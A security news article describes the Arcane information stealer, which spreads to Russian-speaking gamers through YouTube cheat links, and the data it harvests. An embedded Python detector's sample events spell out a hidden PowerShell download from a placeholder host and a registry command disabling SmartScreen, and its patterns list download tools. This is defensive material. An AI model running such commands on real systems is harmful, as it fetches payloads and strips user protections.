YouTube Game Cheats Distribute Arcane Stealer Malware to Russian-Speaking Users

New Malware Targeting Gamers: Arcane Stealer Discovered

Recent reports describe a new information stealer known as Arcane, distributed through YouTube videos that advertise game cheats. The malware stands out for the breadth of data it collects and appears to target Russian-speaking users in particular, a sign that gamers are being singled out as a victim population.

In an analysis conducted by Kaspersky, the malware has been noted for its capacity to gather extensive information, including account data from various VPN and gaming clients, as well as from network utility applications such as ngrok, Playit, Cyberduck, FileZilla, and DynDNS. The infection chain starts with a link, posted under a YouTube video, to a password-protected archive. When a user extracts the archive and opens its contents, a batch script runs and uses PowerShell to download additional malicious components.

The batch file does not stop there. It runs two separate binaries from the downloaded archive and tampers with Windows SmartScreen so that the protection that would otherwise warn about, or block, the unsigned downloads no longer applies. Initial findings indicate that one of these binaries is a cryptocurrency miner, while the other, tracked as VGS, is a variant of the Phemedrone stealer.
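The stages described above (a batch script started from an extracted archive, a PowerShell download launched by it, SmartScreen tampering, and payloads executed from the same user-writable directory) can be correlated in endpoint telemetry. The following detection sketch is an added example and is not code from Kaspersky or from the article; the event shape is a constructed, Sysmon-like subset (event 1 = process create, event 13 = registry value set), the sample events are constructed, and the specific SmartScreen registry value names it looks for are an assumption about how such a bypass is typically implemented, not something the article states.

```python
"""Correlate the stages of the batch -> PowerShell -> SmartScreen-tamper -> payload chain.

Added example, not Kaspersky's or the malware author's code. Event field names,
the sample events, and the registry value names are assumptions for illustration.
"""
import re
from collections import defaultdict

# Constructed sample telemetry: one infection chain rooted at cmd.exe (pid 100)
# plus a benign PowerShell session (pid 200) that must not be flagged.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 100, "ppid": 10, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\u\Downloads\cheat\start.bat"'},
    {"id": 1, "pid": 101, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"iwr http://example.invalid/p.zip -OutFile $env:TEMP\\p.zip\""},
    {"id": 1, "pid": 104, "ppid": 100, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer /v SmartScreenEnabled /d Off /f"},
    {"id": 13, "pid": 104,
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SmartScreenEnabled",
     "details": "Off"},
    {"id": 1, "pid": 102, "ppid": 100, "image": r"C:\Users\u\AppData\Local\Temp\p\miner.exe",
     "cmdline": "miner.exe"},
    {"id": 1, "pid": 103, "ppid": 100, "image": r"C:\Users\u\AppData\Local\Temp\p\vgs.exe",
     "cmdline": "vgs.exe"},
    {"id": 1, "pid": 200, "ppid": 20,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Process"},
]

BATCH_RE = re.compile(r"\.(bat|cmd)\b", re.I)
USER_WRITABLE_RE = re.compile(r"\\(Downloads|AppData\\Local\\Temp)\\", re.I)
DOWNLOAD_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer|\bcurl\b|\bwget\b)", re.I)
# Assumed registry values a SmartScreen bypass would touch (not stated by the article).
SMARTSCREEN_RE = re.compile(r"\\(SmartScreenEnabled|EnableSmartScreen)$", re.I)


def _is_cmd(proc):
    return proc is not None and proc["image"].lower().endswith("\\cmd.exe")


def chain_root(pid, by_pid):
    """Attribute an event to the cmd.exe that spawned the process (the batch script), if any."""
    proc = by_pid.get(pid)
    if proc is None or _is_cmd(proc):
        return pid
    parent = by_pid.get(proc["ppid"])
    return parent["pid"] if _is_cmd(parent) else pid


def detect(events):
    """Return one finding per cmd.exe root that exhibits at least two stages of the chain."""
    by_pid = {e["pid"]: e for e in events if e["id"] == 1}
    stages = defaultdict(set)
    for e in events:
        root = chain_root(e["pid"], by_pid)
        if e["id"] == 1:
            img = e["image"].lower()
            if _is_cmd(e) and BATCH_RE.search(e["cmdline"]) and USER_WRITABLE_RE.search(e["cmdline"]):
                stages[root].add("batch_from_user_dir")
            elif root != e["pid"]:  # a child of the batch script's cmd.exe
                if "powershell" in img and DOWNLOAD_RE.search(e["cmdline"]):
                    stages[root].add("powershell_download")
                elif USER_WRITABLE_RE.search(e["image"]):
                    stages[root].add("payload_from_user_dir")
        elif e["id"] == 13 and SMARTSCREEN_RE.search(e["target"]):
            stages[root].add("smartscreen_tamper")
    findings = []
    for pid, seen in sorted(stages.items()):
        if len(seen) >= 2:
            findings.append({
                "root_pid": pid,
                "stages": sorted(seen),
                "severity": "high" if "smartscreen_tamper" in seen else "medium",
            })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Requiring two stages under one cmd.exe root keeps a lone admin download or a lone `reg add` from firing; the SmartScreen write raises severity because it is the step that removes the user's last warning before the payloads run.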

More recently, the campaign has switched from VGS to the more capable Arcane. Although many of Arcane's features appear borrowed from existing stealers, Kaspersky's researchers have not been able to attribute it definitively to any known malware family.

Arcane is designed to harvest a wealth of sensitive data, including login credentials, passwords, credit card information, and cookies from a variety of widely used web browsers. Additionally, it can extract configuration files and settings from various applications, which encompass VPN services such as OpenVPN, NordVPN, and ExpressVPN; messaging platforms like Discord and Telegram; email clients including Microsoft Outlook; gaming services like Steam and Riot Client; and multiple cryptocurrency wallets.

The malware can also capture screenshots of the compromised device, inventory running processes, and list saved Wi-Fi networks along with their passwords.

Kaspersky also describes how Arcane gets at browser data: it uses the Windows Data Protection API (DPAPI) to recover the encryption keys that browsers generate to protect stored secrets. For keys that DPAPI alone does not yield, Arcane bundles a utility called Xaitax, which it runs silently to crack the browser keys; the malware then reads the recovered keys from the utility's console output and uses them to decrypt the stored data.

The operators behind Arcane have also introduced a loader named ArcanaLoader, marketed as a way to obtain game cheats but in practice serving as a delivery vehicle for the stealer. Kaspersky's telemetry shows Russia, Belarus, and Kazakhstan as the countries most affected by the campaign.

The campaign is a reminder of how quickly threat actors refine both their tooling and their distribution channels. Given the range of data Arcane collects and the steps it takes to reach protected browser keys, users who download game cheats, and the organizations whose credentials live on those machines, have reason for heightened vigilance. In MITRE ATT&CK terms, the chain described here covers initial access through a link that the victim follows, execution via the batch script and PowerShell, defense evasion through the SmartScreen tampering, and credential access against browsers, VPN clients, messengers, and wallets. Business owners and technical staff should treat a gaming machine that has run a cheat archive as a potential source of leaked credentials.
